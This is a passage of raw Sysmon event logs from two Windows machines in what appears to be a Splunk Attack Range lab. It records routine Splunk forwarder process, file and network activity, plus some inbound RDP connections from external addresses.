09:10:37.583{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A8D-6151-BF79-00000000FD01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978602Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.568{69CF5F33-8A8D-6151-BF79-00000000FD01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000978601Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:34.026{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52987-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001049922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:38.918{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88030E8254640D88751E554A43CE57D7,SHA256=C2665A56162C8098D9A93BCBFC957ABE9BF8E3037C35FBC54A05296C61F370FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978618Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:38.880{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35B7844721DFBB6DB36E72BC47088A17,SHA256=9EC3785BB70891D34FF609BBAE95C4DBFF0F33E36DEA8C71FDBF0B5E8EFB8804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:38.556{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=115B05B94927A1865227AEC4C9870481,SHA256=C540CB02A3E3E4E1B020F3889AE10D0F18013D1D4E205FFE555CC48275400BB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:38.556{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=717247F57EAABB2F0DACBD96F85D5A05,SHA256=42841C8CA1C5E2118BF17012116F106F3FFD1D690D0EAC973B551E230B233098,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:36.913{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-54442-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:36.281{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53348-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000978617Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:38.614{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C472E7AAD9F57D3B652B441100A86781,SHA256=A0B38F2E70D7F4044ACFCC5B023C5A896A883754EA0039CC084F39EDC7ED9E1E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978616Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:35.788{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59371-false10.0.1.12-8000- 23542300x80000000000000001049924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:39.919{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3E84687D7EEA9C22292BC53BF710B14,SHA256=F6D5CA78AEA16A325698054A3CA60E6869756F87A46BA6264EA99C9FF808793C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978619Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:39.895{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDBA0E06C2088A38BA25BD70BC0AA883,SHA256=D61AEF527236B37797BEBD28AF7DAE4DF69C9D199A85C11E8EBD4D2EFA0D0BB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:39.255{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C20F1B26D63A855E9C1A21CD29BC650B,SHA256=608FA41EBC18F684818D5262346BE39C1EE324D3B2711440785E01689324246C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978620Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:40.895{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=145969F79668D3BEFC04F3463F605178,SHA256=73D365532B9C28C7906E2E7161BE981610FDE4FA2338076D0FD1D8C8CDB448E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:40.956{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7FB0E05D4A72621685BF774E555A60A,SHA256=8929B2CA09F4997EB586D0346E41B2E59BAC6E4C96F5CEA679A333E0341EAC39,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:38.763{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53349-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:41.971{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ABAE2309C0FF2D0ABD0A95C2A0A7324,SHA256=3146BCE2383D2DB506E5199572C1C28653149318E090F46030E889971DBC9659,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978621Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:41.911{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFA17025246F06CDEE14604B8DA36C9E,SHA256=670CCBFD2EE6EB47B9C3389E27C5D138D337AF4F592B3D6E09662BEBFB17A5D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:41.771{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=115B05B94927A1865227AEC4C9870481,SHA256=C540CB02A3E3E4E1B020F3889AE10D0F18013D1D4E205FFE555CC48275400BB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:42.985{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=133306D6A49A3699FEC3DBE5C87D3E5B,SHA256=D859BC0FC69952F10344D32F693AAC1174EEC9EDB9F91E02C7AC04E95B653998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978624Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:42.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE0947C9D09AC38B83622305A32393A6,SHA256=91A86199C53689D48EDD93348E2AFE4CD99D924C98D3008FE8B9B67A1600903A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978623Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:42.915{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2079D8AD5BEB7D9CC63BBDE0A914D15E,SHA256=F6031404695F00A97A5B8321B3A48C2D68B3EB527E227308B1AC17C6A451B9B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:40.163{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60578-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000978622Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:38.983{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56057-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978626Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:43.930{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6966D6BA6533E661C74E9E6F1B3DC9F9,SHA256=41EC8B4435160B0DC1F2BD3C1EB35643D33D509A99504B815E69A20FDA6F2EDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978625Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:40.835{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59372-false10.0.1.12-8000- 23542300x8000000000000000978627Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:44.946{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB08525DD634992C63AD0FEDFF6EC87D,SHA256=2609E62358C86672EF74D3CC07B1FBC6B25FA50263F55A05C1FC856B528FB730,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:44.652{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A94-6151-2B7A-00000000FC01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:44.637{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:44.637{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:44.637{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:44.637{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:44.637{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A94-6151-2B7A-00000000FC01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:44.637{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A94-6151-2B7A-00000000FC01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:44.616{5EBD8912-8A94-6151-2B7A-00000000FC01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:44.000{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8222AFB3103916C817FF4650F54E0774,SHA256=67F6D34DF26FA312E68A6EDC41846FD71D05887E6B43B9FBDDAD014473076D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978628Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:45.946{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5128F15926D43B199A7639C6792B67A,SHA256=FEC8EB650DC8B397E8EC66CB5CE4CA5FEAC436F2F8C6925ED02CBB355141AD97,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:43.926{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53350-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.615{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82CF04F6B2418E2542A9902D7A2A8D6B,SHA256=A6AACCD0CAC86B7ACEE210F47A71D46FFE7A4DFE5623A878C6232C850EA6C831,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.553{5EBD8912-8A95-6151-2C7A-00000000FC01}68006724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.315{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A95-6151-2C7A-00000000FC01}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:45.315{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 